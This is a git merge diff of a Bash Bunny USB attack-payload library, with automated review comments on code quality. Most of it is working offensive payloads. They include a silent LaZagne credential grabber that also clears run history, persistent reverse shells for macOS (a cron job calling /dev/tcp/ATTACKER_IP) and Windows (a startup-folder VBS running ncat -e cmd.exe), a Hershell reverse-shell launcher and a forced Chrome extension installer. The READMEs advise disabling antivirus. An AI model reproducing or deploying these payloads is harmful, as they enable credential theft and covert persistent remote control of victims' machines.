Merge remote-tracking branch 'upstream/master'

pull/340/head
root 2018-05-07 09:35:47 -05:00
commit e984278d66
28 changed files with 704 additions and 99 deletions


@ -1,6 +1,6 @@
# Payload Library for the Bash Bunny by Hak5
![Bash Bunny](https://cdn.shopify.com/s/files/1/0068/2142/products/bashbunny_2a_large.png "Bash Bunny")
![Bash Bunny](https://www.hak5.org/wp-content/uploads/2017/10/icon3-169x169.png)
* [Purchase at HakShop.com](https://hakshop.com/products/bash-bunny "Purchase at HakShop.com")
* [Documentation and Wiki](http://wiki.bashbunny.com/#!index.md "Documentation and Wiki")

languages/de.json Normal file → Executable file

@ -17,6 +17,7 @@
"__comment":" ",
"__comment":"A = LeftShift + a, { = LeftShift + [",
"__comment":" ",
"__comment":"German umlauts added by Simon Dankelmann",
"a":"00,00,04",
"b":"00,00,05",
"c":"00,00,06",
@ -165,5 +166,14 @@
"|":"40,00,64",
"COMMAND-CTRL-SHIFT":"40,00,64",
"COMMAND-CTRL":"40,00,64",
"COMMAND-OPTION-SHIFT'":"40,00,64"
}
"COMMAND-OPTION-SHIFT'":"40,00,64",
"ß":"00,00,2d",
"€":"40,00,08",
"§":"02,00,20",
"ä":"00,00,34",
"ö":"00,00,33",
"ü":"00,00,2f",
"Ä":"02,00,34",
"Ö":"02,00,33",
"Ü":"02,00,2f"
}


@ -0,0 +1,27 @@
#!/bin/bash
################################################################################
# Allow Debugging messages written to: "/root/udisk/debug/[session].txt"
# on the BashBunny
#
# How this works?
# 1) Example Command: DEBUG "switch-1-debug" "Hello from debug extension!"
# 2) After bashing, text can be read at: "/root/udisk/debug/[session].txt"
# on the BashBunny
################################################################################
function DEBUG() {
session=$1
message=$2
timestamp () {
echo "$(date +"%Y-%m-%d_%H-%M-%S")"
}
mkdir -p /root/udisk/debug/
debug_file="/root/udisk/debug/${session}.txt"
[[ -f "${debug_file}" ]] || echo "$(timestamp): DEBUG STARTED" >> "${debug_file}"
echo "$(timestamp): ${message}" >> ${debug_file}
}
export -f DEBUG
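Review bot: `session` and `message` on L61–L62 are plain assignments and `timestamp` is redefined as a global function on each call, so this exported helper leaks three names into whichever payload calls it; declare them `local session=$1` and `local message=$2`, and replace the nested function plus the useless `echo "$(date ...)"` with a single `date +"%Y-%m-%d_%H-%M-%S"` call. L69 redirects to `${debug_file}` unquoted while L68 quotes the same variable; use `>> "${debug_file}"` on both lines. The session name also becomes a path component without any check, so a value containing `/` writes outside `/root/udisk/debug/`; rejecting anything but a plain name, e.g. `[[ $session =~ ^[A-Za-z0-9_-]+$ ]] || return 1`, keeps the log where the header comment says it is.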


@ -19,11 +19,11 @@ function GET() {
;;
"TARGET_OS")
TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq)
ScanForOS=$(nmap -Pn -O $TARGET_IP -p1)
[[ $ScanForOS == *"Too many fingerprints"* ]] && ScanForOS=$(nmap -Pn -O --osscan-guess $TARGET_IP)
[[ $ScanForOS == *"Windows"* ]] && export TARGET_OS='WINDOWS' && return
[[ $ScanForOS == *"Linux"* ]] && export TARGET_OS='LINUX' && return
[[ $ScanForOS == *"Apple"* ]] && export TARGET_OS='MACOS' && return
ScanForOS=$(nmap -Pn -O $TARGET_IP -p1 -v2)
[[ $ScanForOS == *"Too many fingerprints"* ]] && ScanForOS=$(nmap -Pn -O $TARGET_IP --osscan-guess -v2)
[[ "${ScanForOS,,}" == *"windows"* ]] && export TARGET_OS='WINDOWS' && return
[[ "${ScanForOS,,}" == *"apple"* ]] && export TARGET_OS='MACOS' && return
[[ "${ScanForOS,,}" == *"linux"* ]] && export TARGET_OS='LINUX' && return
export TARGET_OS='UNKNOWN'
;;
esac


@ -1,26 +1,29 @@
#!/bin/bash
#Title: Mac_Happy
# Title: Mac_Happy
# Author: thehappydinoa
# Target: Mac
# Version: 0.1
# Target: macOS
# Version: 0.3
#
# Makes Mac happy by correctly setting pid and vid
# Use by running mac_happy ATTACKMODE HID <attack modes here>
# Use by running MAC_HAPPY HID/ETHERNET/...
#
function mac_happy() {
[[ -z "$1" ]] && exit 1 # parameter must be set
[[ ! $1 =~ "ATTACKMODE" ]] && exit 1 # parameter must be for ATTACKMODE
for i in $*;
do
command=$(echo $command $i)
done
command=$(echo $command VID_0X05AC PID_0X021E)
eval $command
function MAC_HAPPY() {
[[ "$#" -gt 1 ]] || exit 1
case "$1" in
HID)
ATTACKMODE HID vid_0x05ac pid_0x021e
;;
ETHERNET)
ATTACKMODE ECM_ETHERNET vid_0x05ac pid_0x021e
;;
ATTACKMODE)
eval "$@ vid_0x05ac pid_0x021e"
;;
*)
exit 1
;;
esac
}
export -f mac_happy
export -f MAC_HAPPY
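Review bot: The guard on L119, `[[ "$#" -gt 1 ]] || exit 1`, rejects the one-argument forms `MAC_HAPPY HID` and `MAC_HAPPY ETHERNET` that the usage comment on L107 advertises, so those calls terminate the payload before the `case` is reached; `[[ "$#" -ge 1 ]] || exit 1` matches the documented interface. The `ATTACKMODE)` arm on L128 does not need `eval`: `"$@" vid_0x05ac pid_0x021e` runs the same command without re-parsing the caller's arguments as shell source. Since this is an exported helper, `return 1` in place of `exit 1` would let a calling payload reach its own failure handling, if the callers expect that — worth confirming against the payloads that use it.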


@ -0,0 +1,17 @@
#!/bin/bash
#
# WAIT v1 by @Hak5Darren
# Waits blocks the payload from continuing until the switch position has changed
# Usage: WAIT
function WAIT() {
GET SWITCH_POSITION
TEST=$SWITCH_POSITION
while true
do GET SWITCH_POSITION
if [ $SWITCH_POSITION != $TEST ]; then break; fi
sleep 1
done
}
export -f WAIT
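Review bot: `[ $SWITCH_POSITION != $TEST ]` on L151 is unquoted, so if `GET SWITCH_POSITION` leaves the variable empty the test degenerates to `[ != ]` and reports a syntax error once a second instead of comparing; `[[ "$SWITCH_POSITION" != "$TEST" ]]` is the safe form. `TEST` on L148 is assigned as a global from an exported function and so leaks into the calling payload; declare it `local TEST`. The header comment on L144 reads "Waits blocks the payload"; suggest `# Blocks the payload from continuing until the switch position changes`.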


@ -1,4 +0,0 @@
@echo off
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
cscript %~dp0\i.vbs %~dp0\e.cmd
@exit


@ -1,24 +0,0 @@
@echo off
@echo Installing Windows Update
setlocal
cd /d %~dp0
REM Time and Date
set drec=%COMPUTERNAME%_%date%_%TIME: =0%
set dst=%~dp0\..\..\loot\USB_Exfiltration\%drec%
mkdir %dst% >>nul
REM This executes LaZagne in the current directory and outputs the password file to Loot
%~dp0\laZagne.exe all -v > "%~dp0\..\..\loot\PasswordGrabber\%drec%\passwords.txt"
if Exist c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* (
xcopy /C /Q /G /Y /E c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* %dst% >>nul
)
REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
@cls
@exit


@ -1 +0,0 @@
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False


@ -0,0 +1,5 @@
$dest = ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'loot\PasswordGrabber')
$filter = 'password_'+ $env:COMPUTERNAME
$filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1)
Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'tools\laZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt')
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue


@ -1,19 +1,33 @@
#!/bin/bash
#
# Title: Password Grabber
# Author: Razerblade
# Version: 1.2
# Target: Windows
# Props: Hak5Darren, TeCHemically, dragmus31
# Description: Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more...
# This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack.
# This payload makes use of AleZssandroZ awsome LaZagne password recovery tool.
# Author: jdebetaz
# Props: Hak5Darren, AlessandroZ, TeCHemically, dragmus13, RazerBlade
# Version: 1.1
# Category: Credentials
#
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn executes e.cmd invisibly using i.vbs
# which in turn steals credentials by using LaZagne and saves them to /Loot
#
# Target: Windows
# Attackmodes: HID, STORAGE
# Options
LOOTDIR=/root/udisk/loot/PasswordGrabber
######## INITIALIZATION ########
LED SETUP
GET SWITCH_POSITION
LED ATTACK
ATTACKMODE HID STORAGE
RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
LED FINISH
######## MAKE LOOT DIRECTORY ########
# Setup named logs in loot directory
mkdir -p $LOOTDIR
######## ATTACK ########
LED ATTACK
RUN WIN "powerShell -windowstyle hidden -ExecutionPolicy Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\payload.ps1')"
# Wait until passwords are grabbed.
sleep 10
######## FINISH ########
LED FINISH
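Review bot: The rewritten header says `# Version: 1.1` on L215 while the README changed in this same commit says `Version: 1.3` and the header it replaces said 1.2, so the version moves backwards and the two files disagree; pick one value and use it in both. The `# Description:` line was dropped from the header along with the old credits block, yet the other payload headers added in this commit (L699, L782) carry a one-line description, so keep one here for consistency.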


@ -1,40 +1,35 @@
# PasswordGrabber
* Author: RazerBlade
* Creds: Hak5Darren, AlessandroZ, TeCHemically, dragmus31
* Version: Version 1.2
* Firmware support: 1.1+
* Target: Windows 7+
* Author: [jdebetaz](https://github.com/jdebetaz)
* Creds: [Hak5Darren](https://github.com/hak5darren), [AlessandroZ](https://github.com/AlessandroZ), TeCHemically, dragmus13, RazerBlade
* Version: 1.3
* Frimware support: 1.1 and higher
* Target version: Windows 7 and higher
## Description
Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack. This payload makes use of AleZssandroZ awsome LaZagne password recovery tool.
Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more...
This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack.
This payload makes use of AleZssandroZ awsome LaZagne password recovery tool.
Full read here: https://github.com/AlessandroZ/LaZagne
Downloads here: https://github.com/AlessandroZ/LaZagne/releases
Full read here: [LaZagne Repository](https://github.com/AlessandroZ/LaZagne)
## Configuration
1. You need to download the latest file from LaZagnes release page.
2. Unzip the exe file and place it in the payload folder. The payload folder should contain all the file that is in the Payload folder + LaZagne.exe
3. Plug it in a computer and PWN them.
1. You need to download the lastest file from [LaZagne release page](https://github.com/AlessandroZ/LaZagne/releases).
2. Unzip the exe file and place it in the tools folder. The payload folder should contain all the files that are in this payload and the LaZagne.exe
3. Plug your BashBunny and Enjoy
Tips: You may need to disable antivirus when downloading and unziping the file as I have noticed that some antivirus like AVAST removes the file.
Tips: You may need to disable your antivirus when downloading and unziping the file as I have noticed that some antivirus like AVAST removes the file.
## INFO
By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder.
## Info
jdebetaz: I remake this playload with the Payload Best Practice / Style Guide
## DISCLAIMER
Hak5 is not responsible for the execution of 3rd party binaries.
## STATUS
RazerBlade: By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder.
| LED | Status |
| ------------------ | -------------------------------------------- |
| Red | Attack Setup |
| Green | Attack Complete |
## Disclaimer
__Hak5 and playload's contributors are not responsible for the execution of 3rd party binaries.__
## Discussion
[Hak5 Forum Thread] = https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/
## Led status
| LED | Status |
|-----------------------------------------------|--------|
| Magenta solid | Setup |
| Yellow single blink | Attack |
| Green 1000ms VERYFAST blink followed by SOLID | Finish |



@ -0,0 +1,68 @@
#!/bin/bash
#
# Title: Optical Exfiltration
# Author: bg-wa
# Version: 1.0
# Category: HID
# Target: *NIX
# Attackmodes: HID
# Sources: Hak5 2320, https://github.com/bg-wa/QRExtractor
#
# Quick HID only attack to write an HTML/JS file to target machine
# and open a browser, to exfiltrate data Using QR Codes and a video
# recording device.
#
# Optional html params:
# base64: Passing a base64 string to this param will auto-start processing QR Codes.
#
# playback: Passing the string "finish" to this param will auto-play the results,
# when QR codes finish rendering.
#
# Example:
# Ln65: Q STRING firefox "$target_html?playback=finish&base64=my_long_string"
#
# | Attack Stage | Description |
# | ------------------- | ---------------------------------------- |
# | SETUP | Open vi |
# | ATTACK | Writing HTML |
# | FINISH | Browser Ready/Processing |
#
ATTACKMODE HID
LED SETUP
target_html=\~\/index.html
RUN UNITY xterm
Q DELAY 1000
Q STRING rm "$target_html"
Q ENTER
Q DELAY 500
Q STRING vi "$target_html"
Q ENTER
Q DELAY 1000
Q STRING i
LED ATTACK
payload_dir=/root/udisk/payloads/$SWITCH_POSITION
source_html=$payload_dir/index.min.html
while IFS= read data
do
if [ "${data}" = " " ]
then
Q SPACE
else
Q STRING "$data"
fi
done < "$source_html"
Q ESC
Q STRING :x
Q ENTER
Q STRING firefox "$target_html"
Q ENTER
LED FINISH


@ -26,6 +26,13 @@ ATTACKMODE HID
INFINITE_KEY=CTRL
#INFINITE_KEY=BREAK
# Setting MAX_SECONDS will utilize random value
# else leave blank, "MAX_SECONDS=", to use
# FIXED_SECONDS value every time.
# 300 == 5min
MAX_SECONDS=300
FIXED_SECONDS=9
# infinite while loop
while true
do
@ -33,7 +40,13 @@ do
QUACK $INFINITE_KEY
sleep 1
LED ATTACK
sleep 9
# Slight change from original to support "random"
# delays between key presses.
if [ ! -z MAX_SECONDS ]; then
sleep $(($RANDOM % $MAX_SECONDS))
else
sleep $FIXED_SECONDS
fi
done
# this code will never be reached
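Review bot: `if [ ! -z MAX_SECONDS ]; then` on L384 tests the literal word `MAX_SECONDS`, not the variable, so the condition is always true and the `FIXED_SECONDS` branch that the comments on L368–L370 promise (leave `MAX_SECONDS=` blank to use the fixed delay) can never run; `if [ -n "$MAX_SECONDS" ]; then` is what was meant. With that fix an empty `MAX_SECONDS` selects the fixed delay as documented, but `$(($RANDOM % $MAX_SECONDS))` on L385 still aborts with a division error when `MAX_SECONDS=0`, and can sleep 0 seconds; `sleep $(( RANDOM % MAX_SECONDS + 1 ))` avoids the zero-length case. The `while true` loop closed by `done` on L389 opens in the previous hunk (L375).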


@ -0,0 +1,55 @@
REM Title: Chrome Extension Installer
REM Author: audibleblink
DELAY 1000
REM Open Extension URL
GUI SPACE
DELAY 500
STRING chrome
DELAY 500
ENTER
DELAY 4000
GUI l
DELAY 200
STRING https://chrome.google.com/webstore/detail/ncage/hnbmfljfohghaepamnfokgggaejlmfol
DELAY 500
ENTER
DELAY 3000
REM Open the JavaScript console in the browser
REM GUI-ALT j doesn't work, so we have to do it the long way
CTRL F2
DELAY 100
STRING v
DELAY 100
DOWNARROW
DELAY 100
STRING d
DELAY 100
RIGHTARROW
DELAY 100
STRING j
DELAY 100
ENTER
DELAY 3000
REM Use jQuery to click the Install button
STRING $("div[role='button']").click()
ENTER
DELAY 2000
REM Confirm the installation
REM Depends on a MacOS setting that allows tabbing through dialogs
SHIFT TAB
DELAY 300
SPACE
DELAY 4000
REM Close the tabs you just opened
GUI w
DELAY 300
GUI w


@ -0,0 +1,44 @@
#!/bin/bash
# ATTENTION: Requires newest firmware with newest extensions
# Installs the ncage (or any) Google Chrome extension
# using jquery which is kindly supplied by the app store.
## Status
# | LED | Status |
# | --------- | ----------- |
# | Magenta Solid | Setting up |
# | Blue Blinking | Attacking |
# | Green | Finished |
# | Red | Failed |
## Setup
LED SETUP
ATTACKMODE AUTO_ETHERNET ETHERNET_TIMEOUT_10
GET TARGET_OS
GET SWITCH_POSITION
LED ATTACK
case "$TARGET_OS" in
WINDOWS)
ATTACKMODE HID
QUACK ${SWITCH_POSITION}/win.txt
LED FINISH
;;
MACOS)
MAC_HAPPY ATTACKMODE HID
QUACK ${SWITCH_POSITION}/osx.txt
LED FINISH
;;
*)
DEBUG "ncage" "OS Not Detected"
LED FAIL2
;;
esac
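Review bot: `QUACK ${SWITCH_POSITION}/win.txt` on L465 and the matching `osx.txt` call on L470 are unquoted; `QUACK "${SWITCH_POSITION}/win.txt"` is the safe form. The README added in this commit tells the user to "Configure each ducky.{win,osx} file", but the payload reads `win.txt` and `osx.txt`, so the configuration step names files that do not exist; align the README with the real names. The LED table in the header (L455) lists `Red | Failed` while the `*)` arm calls `LED FAIL2`, and the README's table has no failure row at all — state which pattern the failure branch shows, in both places.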


@ -0,0 +1,26 @@
# nCage
Author: audibleblink
Version: 2.0
## Description
ATTENTION: Requires newest firmware (1.5+) with newest extensions
Installs the ncage (or any) Google Chrome extension
using jquery which is kindly supplied by the app store.
## Configuration
* Configure each ducky.{win,osx} file to your liking
## Requirements
Just plug and play
## Status
| LED | Status |
| --------- | ----------- |
| Magenta Solid | Setting up |
| Blue Blinking | Attacking |
| Green | Finished |


@ -0,0 +1,35 @@
REM Title: Chrome Extension Installer
REM Author: audibleblink
DELAY 3000
REM Open Extension URL
GUI r
DELAY 600
STRING chrome https://chrome.google.com/webstore/detail/ncage/hnbmfljfohghaepamnfokgggaejlmfol
DELAY 200
ENTER
DELAY 8000
REM Open the JavaScript console in the browser
CTRL-SHIFT j
DELAY 4000
REM Use jQuery to click the Install button
STRING $("div[role='button']").click()
ENTER
DELAY 2000
REM Confirm the installation
TAB
DELAY 300
SPACE
DELAY 5000
REM Close the tabs you just opened
CTRL w
DELAY 300
CTRL w


@ -0,0 +1,14 @@
# Hershell Encrypted Reverse Shell (Cross-platform - Manual Mode)
Author: m3t4lk3y<br>
Creds: Ronan Kervella (Creator of Hershell)<br>
Version: Version 0.5<br>
## Instructions
Hershell Github: https://github.com/sysdream/hershell (read all instructions on Hershell git before starting)
1. Compile all payloads and place binaries in the `payloads\$SWITCH_POSITION` directory (Double check binary names. Defaults are `mac32`, `linux32`, `win32.exe`)
2. Uncomment desired target OS payload lines and ensure others are commented out
3. Start ncat listener on your attacking machine, that is to receive the reverse shell (e.g. `ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 4343`)
4. Execute attack via Bash Bunny


@ -0,0 +1,118 @@
#!/bin/bash
# Title: Hershell Encrypted Reverse Shell (Cross-platform - Manual Mode)
# Author: m3t4lk3y
# Version: 0.5
# Target: Windows, Mac OSX, Linux
# Creds: Ronan Kervella (Creator of Hershell) - https://github.com/sysdream/hershell
# Instructions:
# Hershell Github: https://github.com/sysdream/hershell (read all instructions on Hershell git before starting)
# 1. Compile all payloads and place binaries in the payloads\$SWITCH_POSITION directory (Double check binary names. Defaults are mac32, linux32, win32.exe)
# 2. Uncomment desired target OS payload lines and ensure others are commented out
# 3. Start ncat listener on your attacking machine, that is to receive the reverse shell (e.g. ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 4343)
# 4. Execute attack via Bash Bunny
# SETUP
DRIVER_LABEL='WINDOWS' # Drive label for your Bash Bunny
LED R
GET SWITCH_POSITION # Gets switch position (e.g. switch2)
ATTACKMODE STORAGE HID SERIAL # Keyboard HID Attack + Storage + Serial
# Modified RUN helper
function RUN() {
local os=$1
shift
[[ -z "$os" || -z "$*" ]] && exit 1
case "$os" in
WIN)
QUACK GUI m
QUACK DELAY 500
QUACK GUI r
QUACK DELAY 500
QUACK STRING cmd.exe
QUACK DELAY 100
QUACK ENTER
QUACK DELAY 500
QUACK STRING "$@"
QUACK DELAY 100
QUACK ENTER
;;
OSX)
QUACK GUI SPACE
QUACK DELAY 100
QUACK STRING terminal
QUACK DELAY 100
QUACK ENTER
QUACK GUI t
QUACK DELAY 100
QUACK STRING /bin/bash
QUACK DELAY 100
QUACK ENTER
QUACK STRING "$@"
QUACK DELAY 100
QUACK ENTER
QUACK DELAY 100
QUACK STRING "exit"
QUACK DELAY 100
QUACK ENTER
QUACK DELAY 100
QUACK STRING "exit"
QUACK DELAY 100
QUACK ENTER
;;
UNITY)
QUACK ALT F2
QUACK DELAY 1000
QUACK STRING xterm
QUACK DELAY 1000
QUACK ENTER
QUACK DELAY 1000
QUACK STRING /bin/bash
QUACK DELAY 1000
QUACK ENTER
QUACK DELAY 500
QUACK STRING cd /media/'$USER'
QUACK DELAY 500
QUACK ENTER
QUACK DELAY 500
QUACK STRING "$@"
QUACK DELAY 500
QUACK ENTER
QUACK DELAY 500
QUACK STRING "exit"
QUACK DELAY 500
QUACK ENTER
QUACK DELAY 500
QUACK STRING "exit"
QUACK DELAY 500
QUACK ENTER
;;
*)
exit 1
;;
esac
}
export -f RUN
# START Attack
LED Y
# [+] Mac - Uncomment the following lines to use:
# until ls -halt /dev | head -n 5 | grep -q "nandf"; do sleep 1; done # Wait for bb to mount
# LED Y FAST
# RUN OSX "cp /Volumes/$DRIVER_LABEL/payloads/$SWITCH_POSITION/mac32 /tmp && chmod +x /tmp/mac32 && /tmp/mac32 &"
# [+] Linux - Uncomment the following lines to use:
until dmesg | grep -q "sunxi_usb"; do sleep 1; done; sleep 5 # Wait for bb to mount
LED Y FAST
RUN UNITY "cd $DRIVER_LABEL/payloads/$SWITCH_POSITION && cp linux32 /tmp/ && chmod +x /tmp/linux32 && /tmp/linux32 &"
# [+] Windows - Uncomment the following lines to use:
# until dmesg | grep -q "sunxi_usb"; do sleep 1; done; sleep 5 # Wait for bb to mount
# LED Y FAST
# RUN WIN powershell -NoP -NonI -W Hidden -exec bypass ".((gwmi win32_volume -f 'label=''$DRIVER_LABEL''').Name+'\payloads\\$SWITCH_POSITION\win32.exe')"
# END
sleep 5
LED G
# shutdown 0 # LIGHTS OUT = Shutdown and dismount (if desired)


@ -0,0 +1,44 @@
# Reverse Shell Mac for Bash Bunny
* Author: 0dyss3us (KeenanV)
* Version: 1.2
## Description
Opens a persistent reverse shell on victim's mac and connects it back to host attacker over TCP.
* Targets MacOS
* Connection can be closed and reconnected at any time
* Deploys in roughly 23 sec
* Works well with NetCat as the listener
## Requirements
Have a working Bash Bunny :)
## STATUS
| LED | STATUS |
| -------------------- | ---------------------------- |
| Purple | Setup |
| Amber (Single Blink) | Launching Terminal |
| Amber (Double Blink) | Creating cron job |
| White (Fast Blink) | Cleaning up |
| Green | Finished |
## Configuration and Execution
1. Plug in Bash Bunny in arming mode
2. Move files from MacPersistentReverseShell to either switch folder
3. Edit the payload.txt file and replace `ATTACKER_IP` with attacker's IP and `PORT` with whichever port you like to use (I use 1337 :wink:)
5. Unplug Bash Bunny and switch it to the position the payload is loaded on
6. Plug the Bash Bunny into your victim's Mac and wait until the final light turns green (about 30 sec)
7. Unplug the Bash Bunny and go to attacker's machine
8. Listen on the port you chose in the payload.txt file on whichever program you'd like (I use NetCat)
* If using NetCat, run the command `nc -nlvp 1337` (replace the port with the port in connect.sh)
* If using Windows as the attacker machine, you must install Ncat from: http://nmap.org/dist/ncat-portable-5.59BETA1.zip and use the command `ncat` instead of `nc` from the directory that you installed ncat.exe.
9. Wait for connection (Should take no longer than 1 minute as the cron job runs every minute)
10. Once a bash shell prompt appears...YOU'RE DONE!! :smiley: and you can disconnect and reconnect to the victim at any time as long as the user is logged in
## Discussion
[Click here](https://forums.hak5.org/topic/42728-payload-mac-persistent-reverse-shell/) to access the forum post.


@ -0,0 +1,32 @@
# Title: Mac Persistent Reverse Shell
# Description: Creates a persistent reverse shell on Mac victim that connects back to NetCat host
# Author: 0dyss3us (KeenanV)
# Props:
# Version: 1.2
# Category: Remote Access
# Target: MacOS
# Attackmodes: HID, Storage
# Sets attack modes and stores current switch position
LED SETUP
ATTACKMODE HID STORAGE VID_0X05AC PID_0X021E
GET_SWITCH_POSITION
# Opens the terminal
LED STAGE1
RUN OSX terminal
Q DELAY 2000
# Makes a cron job that will run once every minute
Q STRING \(crontab -l 2\>/dev/null\; echo \"\* \* \* \* \* bash -i \>\& /dev/tcp/ATTACKER_IP/PORT 0\>\&1\"\) \| crontab -
Q ENTER
Q DELAY 2000
LED CLEANUP
# Clears and kills the terminal to hide the evidence
Q STRING clear
Q ENTER
Q DELAY 500
Q STRING killall Terminal
Q ENTER
LED FINISH


@ -16,10 +16,8 @@ Configuring this payload is pretty time-consuming, but it's worth it.
1. Download Trustedsec's Unicorn: https://github.com/trustedsec/unicorn and use it to generate a powershell attack script.
2. After you generate a powershell script, execute ```$ msfconsole -r unicorn.rc``` in the same directory in order to start the listener.
3. Transfer **payload.txt** to any of your switches, then open it.
4. Replace ```your_powershell_attack_here``` with the contents of your **powershell_attack.txt** file which was generated.
5. Put a **\\** (backslash) before each special character (**\,** **\"** **\'** **\:** **\;** **\(** **\)** **\[** **\]** **\+**).
6. Save the **payload.txt** file and eject Bash Bunny. You are good to go! Sessions will be opened in the metasploit's listener!
3. You can use [this software(unicorn bash bunny payload generator)](https://github.com/Prodicode/bash-bunny-unicorn-payload-generator) to generate a **payload.txt** from the **powershell_attack.txt**.
4. Transfer the **payload.txt** to one of the switches on the Bash Bunny. You're ready to go!
## Status


@ -0,0 +1,45 @@
# Windows Persistent Reverse Shell for Bash Bunny
* Author: 0dyss3us (KeenanV)
* Version: 1.1
## Description
Opens a persistent reverse shell through NetCat on victim's Windows machine and connects it back to host attacker.
* Targets Windows 10 (working on support for older versions)
* Connection can be closed and reconnected at any time
* Deploys in roughly 15-20 sec
* Works with NetCat
## Requirements
Have a working Bash Bunny :)
## STATUS
| LED | STATUS |
| -------------------- | ------------------------------ |
| Purple | Setup |
| Amber (Single Blink) | Installing and running scripts |
| Green | Finished |
## Installation and Execution
1. Plug in Bash Bunny in arming mode
2. Move files from WindowsPersistentReverseShell to either switch folder
3. Download ncat from http://nmap.org/dist/ncat-portable-5.59BETA1.zip and place the downloaded ncat.exe file in the same switch folder.
4. Edit the persistence.vbs file and replace `ATTACKER_IP` with attacker's IP and `PORT` with whichever port you like to use (I use 1337 :wink:)
5. Edit the run.ps1 file and replace `BashBunny` with the volume name of your Bash Bunny
6. Save the persistence.vbs file
7. Unplug Bash Bunny and switch it to the position the payload is loaded on
8. Plug the Bash Bunny into your victim's Windows machine and wait until the final light turns green (about 15-20 sec)
9. Unplug the Bash Bunny and go to attacker's machine
10. Listen on the port you chose in the persistence.vbs file on NetCat
* Run the command `nc -nlvp 1337` (replace the port with the port in persistence.vbs)
* If using Windows as the attacker machine, you must move the same ncat.exe file downloaded in step 3 to any directory and use the command `ncat` instead of `nc` from that directory.
11. Wait for connection (Should take no longer than 1 minute as the powershell command runs every minute)
12. Once a Windows cmd prompt appears...YOU'RE DONE!! :smiley: and you can disconnect and reconnect at any time as long as the user is logged in
## Discussion
[Click here](https://forums.hak5.org/topic/42729-payload-windows-persistent-reverse-shell/) for forum discussion


@ -0,0 +1,18 @@
# Title: NetCat Reverse Shell Windows
# Description: Creates a persistent reverse shell on Windows and connects back to attacker through NetCat
# Author: 0dyss3us (KeenanV)
# Props:
# Version: 1.0
# Category: Remote Access
# Target: Windows 10
# Attackmodes: HID, Storage
#Sets attack mode and stores current switch position
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
#Runs Powershell script which puts a .vbs file in the startup folder and runs it
LED ATTACK
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
LED FINISH


@ -0,0 +1,7 @@
Dim ncShell
Set ncShell = WScript.CreateObject("WScript.shell")
Do while True:
ncShell.Run "powershell.exe C:\temp\ncat.exe ATTACKER_IP PORT -e cmd.exe", 0, true
WScript.Sleep(60000)
loop


@ -0,0 +1,20 @@
$Drive = (Get-WMIObject Win32_Volume | ? { $_.Label -eq 'BashBunny' }).name
$user = $env:UserName
$NetCatFile = $Drive + "payloads\switch1\ncat.exe"
$PersistenceFile = $Drive + "payloads\switch1\persistence.vbs"
$DestinationFile1 = "C:\temp\ncat.exe"
$DestinationFile2 = ("C:\Users\" + $user + "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\persistence.vbs")
If ((Test-Path $DestinationFile1) -eq $false){
New-Item -ItemType File -Path $DestinationFile1 -Force
}
If ((Test-Path $DestinationFile2) -eq $false){
New-Item -ItemType File -Path $DestinationFile2 -Force
}
Copy-Item -Path $NetCatFile -Destination $DestinationFile1
Copy-Item -Path $PersistenceFile -Destination $DestinationFile2
Set-Location -Path ("C:\Users\" + $user + "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup")
Start-Process cmd -ArgumentList "/c start persistence.vbs"